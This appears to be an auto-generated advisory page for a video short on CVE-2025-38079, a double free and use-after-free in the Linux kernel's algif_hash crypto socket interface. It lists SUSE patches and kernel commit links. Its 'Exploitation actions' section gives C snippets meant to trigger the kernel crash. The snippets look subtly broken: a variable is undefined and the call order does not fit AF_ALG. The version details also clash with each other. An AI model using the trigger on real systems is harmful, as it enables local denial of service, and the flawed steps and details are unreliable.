Linux Kernel: crypto algif_hash double free leading to use-after-free (CVE-2025-38079) #shorts
Summary
In today’s episode, we discuss CVE-2025-38079, a double-free and use-after-free vulnerability in the Linux kernel’s algif_hash crypto interface. SUSE has released security updates to address this flaw, which could be triggered by a crafted call to accept(2) with MSG_MORE on an algif_hash socket.
Product details
This issue affects the Linux kernel in SUSE distributions built from versions starting at commit fe869cdb89c9 up to but not including the fixed commits (e.g., f0f3d09f5353 and onward). SUSE has issued patches for all supported kernel branches, including patch releases for versions 2.6.38 and later.
Vulnerability type summary
CVE-2025-38079 is a memory-corruption bug caused by double freeing an sk_buff object. The root is a double free leading to slab-use-after-free, which can result in a kernel crash or potentially allow an attacker to corrupt kernel memory and escalate privileges.
Details of the vulnerability
When accept(2) is invoked on an AF_ALG socket of type algif_hash with the MSG_MORE flag set, the code path in crypto_ahash_import may fail and free the sk2 socket buffer. Later, af_alg_release also frees sk2 unconditionally. This second free on already-freed memory triggers a slab-use-after-free error. An unprivileged local user could exploit this to crash the kernel or manipulate memory.
Conclusion
SUSE users should update their Linux kernels immediately to the patched versions provided in today’s security advisory. Applying the official SUSE kernel update will eliminate the double-free defect and protect systems from potential denial-of-service or kernel-memory corruption attacks.
Watch the full video on YouTube: CVE-2025-38079
Remediation and exploitation details
This chain involves the following actors
- Local unprivileged user: Attacker
This following systems are involved
- Linux Kernel crypto subsystem (Handles cryptographic hashing requests on AF_ALG sockets): Victim
Attack entry point
- AF_ALG hash_accept path: Calling accept(2) on a hash socket with the MSG_MORE flag set triggers the vulnerable code path
Remediation actions
Exploitation actions
Initialize a hashing socket
- int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
Prepare the socket for accept
- struct sockaddr_alg sa = { .sa_family = AF_ALG, .sa_type = "hash", .sa_name = "sha256" };
- bind(s, (struct sockaddr *)&sa, sizeof(sa));
- listen(s, 1);
Trigger double free and use-after-free in hash_accept
- struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1 };
- sendmsg(s, &msg, MSG_MORE);
- int c = accept(s, NULL, NULL);
Cause a slab-use-after-free and crash
- dmesg | grep -i "slab-use-after-free"
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://git.kernel.org/stable/c/5bff312b59b3f2a54ff504e4f4e47272b64f3633
- https://git.kernel.org/stable/c/bf7bba75b91539e93615f560893a599c1e1c98bf
- https://git.kernel.org/stable/c/c3059d58f79fdfb2201249c2741514e34562b547
- https://git.kernel.org/stable/c/f0f3d09f53534ea385d55ced408f2b67059b16e4
- https://git.kernel.org/stable/c/134daaba93193df9e988524b5cd2f52d15eb1993
- https://git.kernel.org/stable/c/2f45a8d64fb4ed4830a4b3273834ecd6ca504896
- https://git.kernel.org/stable/c/0346f4b742345d1c733c977f3a7aef5a6419a967
- https://git.kernel.org/stable/c/b2df03ed4052e97126267e8c13ad4204ea6ba9b6
- [2025-08-20] SUSE releases important Linux Kernel patch for vulnerabilities CVE-2025-38079 and others.
- [2025-08-20] SUSE releases important Linux Kernel updates to address security vulnerabilities CVE-2025-38079 and CVE-2025-38083.
- [2025-08-21] SUSE releases a key security update for the Linux Kernel addressing CVE-2025-38079 DoS vulnerability.
- [2025-08-21] SUSE releases an important security fix for the Linux Kernel addressing CVE-2025-38079.